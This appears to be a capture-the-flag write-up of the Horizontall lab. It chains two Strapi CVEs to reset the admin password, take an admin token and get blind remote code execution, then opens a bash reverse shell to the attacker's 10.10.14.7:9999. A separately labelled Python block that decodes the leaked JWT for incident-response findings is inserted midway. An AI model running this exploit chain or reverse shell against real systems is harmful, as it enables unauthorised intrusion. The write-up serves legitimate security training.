Remote Code Execution


The web application hosts a vulnerable instance of Strapi on the virtual host / sub-domain api-prod.horizontall.htb. The target Strapi instance is confirmed to be vulnerable to both [[horizontall_cve-2019-18818#cve-2019-18818|CVE-2019-18818]] and [[Horizontall_CVE-2019-19609#CVE-2019-19609|CVE-2019-19609]], which together give unauthenticated remote code execution: first a forced password reset of the admin account, then command execution with the resulting session.

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ python3 rce.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
 
 
[+] Password reset was successfully
[+] your email is: admin@horizontall.htb
[+] your new credentials are: admin:SuperStrongPassword1
[+] your authenticated json web token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjgxMzk5MDY0LCJleHAiOjE2ODM5OTEwNjR9.L5UseQ5IxN-9exnk_UQaUqoBqEQhDWNfB0QX2FJY4Pk
 
 
$> 

Launching the Python script first performs a password reset against the admin user and retrieves the session token. It then sets up a temporary pseudo-shell that executes commands through the Install plugin component located at /admin/plugins/install.
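
An added check from the responder's side (not part of the original writeup or of the exploit script): decoding the admin token the script printed to see what it grants and how long it stays valid. The signature is not verified, since that needs the server's JWT secret, and the one-day lifetime threshold is an assumption of this example, not a Strapi setting.

```python
import base64
import json

# Token copied from the exploit output above. The signature is NOT verified
# here (that would need the server's secret); only the claims are inspected.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjgxMzk5MDY0LCJleHAiOjE2ODM5OTEwNjR9."
         "L5UseQ5IxN-9exnk_UQaUqoBqEQhDWNfB0QX2FJY4Pk")


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url with the padding stripped; restore it first."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> tuple[dict, dict]:
    """Split a compact JWS into (header, payload) without checking the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated segments")
    return json.loads(b64url_decode(parts[0])), json.loads(b64url_decode(parts[1]))


def token_findings(token: str, max_lifetime_days: float = 1.0) -> list[str]:
    """Points an incident responder would note about a token seen in attacker output.

    max_lifetime_days is an assumed review threshold for this example, not a Strapi setting.
    """
    header, payload = decode_jwt_unverified(token)
    findings = []
    alg = header.get("alg", "")
    if alg.startswith("HS"):
        findings.append(f"alg={alg}: HMAC shared secret; rotating it invalidates every issued token")
    if payload.get("isAdmin") is True:
        findings.append("isAdmin=true: the token grants admin-panel privileges")
    if "iat" in payload and "exp" in payload:
        days = (payload["exp"] - payload["iat"]) / 86400
        if days > max_lifetime_days:
            findings.append(f"lifetime {days:g} days exceeds the {max_lifetime_days:g}-day threshold")
    else:
        findings.append("no exp claim: the token never expires on its own")
    if "jti" not in payload:
        findings.append("no jti claim: the token cannot be revoked individually via a deny-list")
    return findings


if __name__ == "__main__":
    print(*decode_jwt_unverified(TOKEN))
    for finding in token_findings(TOKEN):
        print("-", finding)
```

For this token the payload decodes to an admin identity with a 30-day validity window, so after the compromise the only way to invalidate it before expiry is to rotate the HS256 secret.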

$> id
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statuscode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

Entering an OS command prints no output, since this is a blind RCE; the command does execute, however.

$> ping 10.10.14.7 -c 4
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statuscode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

I can confirm that by pinging Kali 4 times

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ sudo tcpdump -i tun0 -p icmp                          
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:16:30.399364 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 1, length 64
18:16:30.399509 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 1, length 64
18:16:31.399506 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 2, length 64
18:16:31.399521 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 2, length 64
18:16:32.402460 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 3, length 64
18:16:32.402476 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 3, length 64
18:16:33.404127 IP horizontall.htb > 10.10.14.7: ICMP echo request, id 8112, seq 4, length 64
18:16:33.404159 IP 10.10.14.7 > horizontall.htb: ICMP echo reply, id 8112, seq 4, length 64

As shown above, Kali received 4 ICMP packets

$> /bin/bash -c '/bin/sh -i >& /dev/tcp/10.10.14.7/9999 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output

I sent in a very simple bash reverse shell command

┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 45718
/bin/sh: 0: can't access tty; job control turned off
$ whoami
strapi
$ hostanme
/bin/sh: 2: hostanme: not found
$ hostname
horizontall
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.105  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e92  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:92  txqueuelen 1000  (Ethernet)
        RX packets 3056592  bytes 579882623 (579.8 MB)
        RX errors 0  dropped 100  overruns 0  frame 0
        TX packets 3048785  bytes 1357919332 (1.3 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8824252  bytes 1057719957 (1.0 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8824252  bytes 1057719957 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the strapi user by chaining [[horizontall_cve-2019-18818#cve-2019-18818|CVE-2019-18818]] and [[Horizontall_CVE-2019-19609#CVE-2019-19609|CVE-2019-19609]].